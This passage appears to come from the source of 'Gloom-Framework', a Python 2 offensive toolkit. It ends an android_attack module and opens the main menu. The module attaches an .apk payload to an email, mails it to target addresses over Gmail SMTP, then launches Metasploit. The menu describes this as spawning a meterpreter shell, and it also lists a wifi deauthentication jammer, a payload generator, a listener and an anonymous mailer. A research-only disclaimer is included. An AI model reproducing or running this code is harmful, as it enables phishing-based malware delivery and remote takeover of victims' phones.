Target...\n\n" 98 | time.sleep(0.5) 99 | 100 | def do_sms_mail(self): 101 | """ 102 | ATTACH PAYLOAD and send Mail 103 | """ 104 | try: 105 | from email import Encoders 106 | 107 | except ImportError as gi: 108 | print self.ERROR_STRING + str(gi) 109 | 110 | except: 111 | pass 112 | 113 | SUBJECT = self.SUBJECT 114 | ATTACK_MSG_ = MIMEMultipart() 115 | ATTACK_MSG_['Subject'] = (self.SUBJECT + '\n' + self.MAIN_MESSAGE) 116 | ATTACK_MSG_['From'] = self.GMAIL 117 | ATTACK_MSG_['To'] = ', '.join(self.TARGET) 118 | 119 | extension = '.apk' 120 | 121 | final_load = self.PAYLOAD_NAME + extension 122 | 123 | part = MIMEBase('application', "octet-stream") 124 | part.set_payload(open(str(final_load), "rb").read()) 125 | Encoders.encode_base64(part) 126 | 127 | part.add_header('Content-Disposition', 'attachment; filename="%s"' 128 | % str(final_load)) 129 | 130 | ATTACK_MSG_.attach(part) 131 | 132 | try: 133 | self.smtp.sendmail(self.GMAIL, self.TARGET, ATTACK_MSG_.as_string()) 134 | print self.INFO_STRING + " Sent Payload Successfully!" 135 | self.IS_SENT = True 136 | 137 | except: 138 | print self.ERROR_STRING + " An Unknown Error Occured" 139 | sys.exit(1) 140 | 141 | def do_metasploit(self): 142 | time.sleep(1.2) 143 | msf_input = raw_input(colored("\n{?} Would You Like to Run Metasploit Now [y/n]: ", 'yellow')) 144 | y_ans = [ 145 | 'yes', 146 | 'y', 147 | 'Y', 148 | 'Yes' 149 | ] 150 | 151 | n_ans = [ 152 | 'no', 153 | 'n', 154 | 'N', 155 | 'No' 156 | ] 157 | 158 | try: 159 | 160 | if msf_input in y_ans and self.PAYLOAD_TYPE == '1': 161 | msf = "sudo msfconsole" 162 | ## Execute 163 | os.system(msf) 164 | 165 | if msf_input in y_ans and self.PAYLOAD_TYPE == '2': 166 | 167 | msf = "sudo msfconsole" 168 | os.system(msf) 169 | 170 | elif msf_input in n_ans: 171 | sys.exit(1) 172 | 173 | except KeyboardInterrupt: 174 | sys.exit(0) 175 | 176 | except: 177 | pass 178 | 179 | -------------------------------------------------------------------------------- /gloom.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Welcome To Gloom 4 | ================ 5 | Welcome to Gloom-Framework v.1.8. Your gonna love the envirenment. 6 | Gloom is an open source Penetration Testing Framework designed for Linux systems. 7 | This piece if software was developed by Josh(Yeah, Just Josh). The Following will be some basic info. 8 | 9 | !DISCLAIMER! 10 | ============ 11 | Gloom is meant for security researching purposes only and should be used 12 | simply for good not for bad. The Developer of this tool is not to be held responsible 13 | for misuse of this software. Please use wisely. Gloom is in it's early stage of development 14 | so please report any issues to the gitHub Repository. 15 | 16 | - Gloom-Framework Developer, 17 | 18 | Josh 19 | 20 | 21 | """ 22 | 23 | 24 | #LIBS AND MODS# 25 | ############### 26 | import os 27 | import sys 28 | import time 29 | import pythonwhois 30 | import datetime 31 | sys.path.append('core/') 32 | from adminfinder import * 33 | from geoip import * 34 | from landiscover import * 35 | from listener import * 36 | from wafdetection import * 37 | from ipresolver import * 38 | from portscanner import * 39 | from banner import * 40 | from wifijammer import * 41 | from payloadgen import * 42 | from fuzzer import * 43 | from checkbreach import * 44 | from anon_email import * 45 | from android_attack import * 46 | 47 | try: 48 | from termcolor import colored, cprint 49 | 50 | except ImportError as ie: 51 | print(str(ie)) 52 | 53 | 54 | class PlatformCheck(object): 55 | def OSCheck(self): 56 | if sys.platform == 'win32': 57 | cprint("[-] Windows 32-Bit Detected! Gloom Framework is Unix/Linux Based!", 'red') 58 | 59 | if sys.platform == 'win64': 60 | cprint("[-] Windows 64-Bit Detected! Gloom Framework is Unix/Linux Based!", 'red') 61 | 62 | else: 63 | cprint("[!] Unix/Linux Kernel Detected!", 'green') 64 | 65 | checkpltf = PlatformCheck() 66 | os.system('clear') 67 | checkpltf.OSCheck() 68 | time.sleep(1.5) 69 | os.system('clear') 70 | 71 | class checkRoot(object): 72 | def sudoCheck(self): 73 | if not os.geteuid() == 0: 74 | os.system('clear') 75 | print("[gloom_error]" + colored(" This Script Must be Run as Root!", 'red')) 76 | sys.exit(1) 77 | 78 | checksudo = checkRoot() 79 | checksudo.sudoCheck() 80 | 81 | class GloomMain(object): 82 | 83 | def on_load(self): 84 | __version__ = '1.8' 85 | __author__ = "Josh" 86 | __date__ = datetime.datetime.now() 87 | __tools__ = "16" 88 | 89 | gloom_tools = [ 90 | 'admin_panel_finder', 91 | 'web_whois', 92 | 'ip_geolocation', 93 | 'discover_lan_devices', 94 | 'website_ip_resolver', 95 | 'wifi_jammer', 96 | 'listener', 97 | 'waf_scanning', 98 | 'port_scanner', 99 | 'payload_generator' 100 | 'alot_more_tools' 101 | 102 | ] 103 | 104 | try: 105 | gloom_prompt = raw_input("\n[" + colored('gloom', 'red') + "] ") 106 | 107 | if gloom_prompt == 'exit': 108 | sys.exit(0) 109 | 110 | if gloom_prompt == 'clear': 111 | os.system('clear') 112 | return gloom_main.on_load() 113 | 114 | if gloom_prompt == 'info': 115 | print("Developer: " + colored(__author__, 'green')) 116 | print("Version: " + colored(__version__, 'green')) 117 | print("Date: " + colored(__date__, 'green')) 118 | print("Tools: " + colored(__tools__, 'blue')) 119 | return gloom_main.on_load() 120 | 121 | if gloom_prompt == 'load': 122 | load_mod = gloom_prompt + '' 123 | if load_mod not in gloom_tools: 124 | print("[gloom_error] " + colored("Failed To Load Module", 'red')) 125 | return gloom_main.on_load() 126 | 127 | elif load_mod in gloom_tools: 128 | print(gloom_prompt + '(' + colored(load_mod, 'red') + ')') 129 | 130 | if gloom_prompt == 'help': 131 | print "\n" 132 | print "\t\t|Core Commands|" 133 | print "=" * 40 134 | print "help :: " + colored("Show This List Again", 'blue') 135 | print "clear :: "+ colored("Clear Screen", 'blue') 136 | print "exit :: " + colored("Leaves Gloom Framework", 'blue') 137 | print "info :: " + colored("Shows Tool Information", 'blue') 138 | print "\n" 139 | print "\t\t|Tools|" 140 | print "=" * 40 141 | print "android_attack :: " + colored("Sends an android payload via. Email and Spawns a meterpreter shell.", 'blue') 142 | print "admin_panel_finder :: " + colored("Find Website Admin Panels", 'blue') 143 | print "ip_geolocation :: " + colored("Geolocate an IP Address", 'blue') 144 | print "web_whois :: " + colored("Gather WHOIS Information on a Target", 'blue') 145 | print "\n" 146 | print "discover_lan_devices :: " + colored("Detect Users/Devices on LAN", 'blue') 147 | print "website_ip_resolver :: " + colored("Get IP Address of Website", 'blue') 148 | print "payload_generator :: " + colored("Generate Windows Payload", 'blue') 149 | print "\n" 150 | print "wifi_jammer :: " + colored("Wireless Deauthentication Attack", 'blue') 151 | print "listener :: " + colored("Listen For Connections on Network", 'blue') 152 | print "check_email_breach :: " + colored("Check if an Email has Been Comprimised", 'blue') 153 | print "\n" 154 | print "waf_scanning :: " + colored("Scan for Website Firewall", 'blue') 155 | print "port_scanner :: " + colored("Scan for Open Ports", 'blue') 156 | print "anon_email :: " + colored("Send An Anonymous Email", 'blue') 157 | print "\n" 158 | print "\t\t|Fuzzing|" 159 | print "=" * 40 160 | print "tcp_fuzzer :: " + colored("Fuzz Applications via. TCP(Port 443)", 'blue') 161 | print "ftp_fuzzer :: " + colored("Fuzz Applications via. FTP(Port 21)", 'blue') 162 | print "http_fuzzer :: " + colored("Fuzz Applications via. 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